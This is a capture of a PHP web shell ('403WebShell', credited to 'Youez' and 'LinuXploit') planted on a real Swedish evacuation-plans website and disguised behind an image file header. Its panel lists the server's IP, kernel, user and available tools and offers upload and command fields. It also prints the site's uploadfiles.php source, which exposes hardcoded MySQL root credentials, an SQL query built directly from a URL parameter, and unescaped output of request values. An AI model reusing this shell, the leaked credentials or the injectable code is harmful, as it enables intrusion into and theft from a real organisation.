????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.61
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/evacuationplans.astacus.se/login/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/evacuationplans.astacus.se/login/uploadfiles.php
<?php 

session_start();

if( (($_SESSION['EP_SSO_INFO'])=='' )){
			header('location: http://www.evacuationplans.se/loggain.php');
	}

	$link = mysql_connect ("localhost", "root", "root123");
					mysql_select_db ("vpa");

$sql = "SELECT * FROM Project WHERE CompanyId = '".$_SESSION['EP_SSO_INFO'][1]."' and ProjectID = '".$_GET['projectid']."'";		
		
	
			$result = mysql_query($sql);
	  		while ($row = mysql_fetch_assoc($result)){ 
				$ProjectName = $row["Name"];
				$CreateDate = substr($row["createDate"],0,10);
			}

$ProjectId = $_GET['projectid'];
$CompanyId = $_SESSION['EP_SSO_INFO'][1];

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>EVACUATION PLANS</title>
<script type="text/javascript">
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
</script>
<style type="text/css">
.Text18Black {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 18px;
	font-style: normal;
}

	
	.Text10Black {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 10px;
	font-style: normal;
}
	
.button {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
}
	
	.button:hover { 
  background-color: #53be58;
}

.Text14Gray {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
	font-style: normal;
	color: #929292;
	text-align: left;
}

#astacus_menu {
	position:fixed;
	left:0px;
	top:0px;
	width: 100%;
	height:45px;
	z-index:100;
}
#astacus_menu table tr td {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 12px;
}
#apDiv1 {
	position:absolute;
	left:1064px;
	top:795px;
	width:124px;
	height:132px;
	z-index:1;
}
</style>
<link REL="SHORTCUT ICON" HREF="../favicon.ico">
<script type="text/javascript" src="universal/universaluploader.js"></script>
	<link rel="stylesheet" href="universal/style.css">
	<!-- Examples css file -->
	<link href="universal/styles.css" type="text/css" rel="stylesheet" />
</head>

<body onload="MM_preloadImages('../images/meny1b.jpg','../images/mwny3b.jpg','../images/meny4b.jpg','../images/astacus-power1.jpg')" topmargin="0" marginheight="0">

<div id="astacus_menu">
<table width="100%" height="45" border="0" cellspacing="0" cellpadding="0" background="http://www.astacus.se/top_banner/background.png">
  <tr  >
   <td><table width="970" height="23" border="0" align="center" cellpadding="0" cellspacing="0">
     <tr>
       <td width="133"  ><a href="http://www.astacus.se/index.php?page=start&amp;from=notes"><img src="http://www.astacus.se/top_banner/logga.png" width="99" height="21" border="0"></a><span style="color:#ffffff"><a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a></span></td>
       <td width="717" valign="bottom"  ><table width="595" height="20" border="0" cellspacing="0" cellpadding="0">
         <tr>
           <td><span style="color:#ffffff; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.astacus.se/index.php?page=nyheter&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">News</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a> <a href="http://www.astacus.se/index.php?page=start&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">Business areas</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a> <a href="http://www.astacus.se/index.php?page=referenser&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">Customers</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a> <a href="http://www.astacus.se/index.php?page=astacus&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">About Astacus</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a><a href="http://www.astacus.se/index.php?page=kontakt&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">Contact us </a></span></td>
         </tr>
       </table></td>
     </tr>
     <tr>
       <td height="5" colspan="2" ></td>
     </tr>
   </table></td>
  </tr>
</table>
</div>
<br />
<br>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="32" rowspan="2" valign="top"><img src="../images/skugga_left.jpg" width="32" height="572" /></td>
    <td width="1135" height="89" valign="top"><table width="985" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td width="754"><br />
          <a href="index.php"><img src="../images/supervision_loggo.png" alt="" width="308" height="74" hspace="0" vspace="0" border="0" /></a></td>
        <td width="232" align="right" valign="bottom"><br /></td>
      </tr>
      <tr>
        <td colspan="2"><a href="index.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','../images/meny1b.jpg',1)"><img src="../images/meny1a.jpg" name="Image1" width="121" height="36" border="0" id="Image1" /></a><img src="../images/meny_l.jpg" alt="" width="1" height="36" /><img src="../images/meny_l.jpg" width="1" height="36" /><img src="../images/meny_pass.jpg" width="749" height="36" /><img src="../images/meny_l.jpg" width="1" height="36" /><a href="../loggain.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image4','','../images/meny4bb.jpg',1)"><img src="../images/meny4aa.jpg" name="Image4" width="111" height="36" border="0" id="Image4" /></a></td>
      </tr>
    </table></td>
    <td width="33" rowspan="2" valign="top"><img src="../images/skugga_right.jpg" width="32" height="572" /></td>
  </tr>
  <tr>
    <td valign="top"><table width="985" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td align="center" class="Text16Gray"><br />
          <table width="90%" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr class="Text18Black">
                <td width="18%">Project name:</td>
                <td width="31%" align="right" style="text-align: left"><?php echo($ProjectName);?></td>
                <td width="51%" align="right">Created date: <span style="text-align: left"><?php echo($CreateDate);?></span></td>
              </tr>
            </tbody>
          </table>
          <br />
          <img src="../images/h_line.jpg" width="984" height="23" /><br />
          <table width="90%" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr class="Text18Black">
                <td>
                	
                	
                	<!-- PlaceHolder for UniversalUploader User Interface. Existing content will not be removed. 
  UniversalUpload will append own content to the end of this div-->
<div id="universalUploader_holder" >
<noscript>
<br/>
<form id="myform" name="myform" action="url to file processing script"  method="post" enctype="multipart/form-data">
<input name="Filedata" type="file"><br>
<input type="submit" value="Upload" />
</form>
 </noscript>
</div>
<!-- Initialization of UniversalUploader object -->	
<script type="text/javascript">
universalUploader.init({
	//Your serialNumber
	serialNumber: "0081141102825226316027322442225716924771310192",
	//List of uploaders to render	
	uploaders: "drag-and-drop, flash, silverlight, java, classic",	
	//First of correctly initialized uploader will be rendered
	singleUploader : false,
	fileFilter_ignoreFolders : true,
	//Id of html element where universalUploader should be rendered
	//If not set, document body used  
	holder: "universalUploader_holder",	
    //Enable thumbnails view
	fileView: "thumbnails",
	thumbnailView_width: 120,
	thumbnailView_height: 120,
	  width:"100%",
  height:"400",
	//Url to the swf file
	flash_swfUrl : "universal/uploaders/ElementITMultiPowUpload.swf",	
	//Url to the xap file
	silverlight_xapUrl : "universal/uploaders/UltimateUploader.xap",
	//url to folder with jar files
	java_libPath : "universal/uploaders/java/",
	//Path to the folder with images (status icons, remove icon) By default images subfolder is used (relative to the html page base path)
	//In these examples we place icons inside universal/images subfolder. 
	imagesPath : "universal/images/",	
	//Url to the file processing script 
	url: "DirUpload.php?projectId=<?php echo($ProjectId);?>&customerId=<?php echo($CompanyId);?>&path=<?php echo(urlencode($_GET['path']));?>"

});

//File upload complete
universalUploader.bindEventListener("UploadComplete", function (uploaderId, file){	
	//var responselable = document.getElementById("serverresponse");		
	//if(file.serverResponse) responselable.innerHTML += "<strong>" + file.serverResponse + "</strong>";		
 
    document.location = "project.php?projectid=<?php echo($ProjectId);?>&uploaded=true";

});	

//File upload error handler
universalUploader.bindEventListener("FileUploadError", function (uploaderId, file, status, msg){
	var responselable = document.getElementById("serverresponse");		
	responselable.innerHTML += "File Upload error "+file.name+" status "+status+" message "+msg;
});


universalUploader.bindEventListener("Init", function (inited){
		if(!inited)			
			alert("UniversalUploader failed to init!");
});
</script>
                	
                	
                </td>
                </tr>
            </tbody>
          </table>
          <br /></td>
      </tr>
    </table>
      <br />
      <table width="985" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td valign="middle" class="Text10Black"><center>&copy; Astacus  AB | Strandv&auml;gen 3, 591 36 Motala, Sweden | 0141 - 540 40 | <a href="mailto:info@astacus.se">info@astacus.se</a></center></td>
        </tr>
      </table></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>
<script>doOnLoad();</script>

Youez - 2016 - github.com/yon3zu
LinuXploit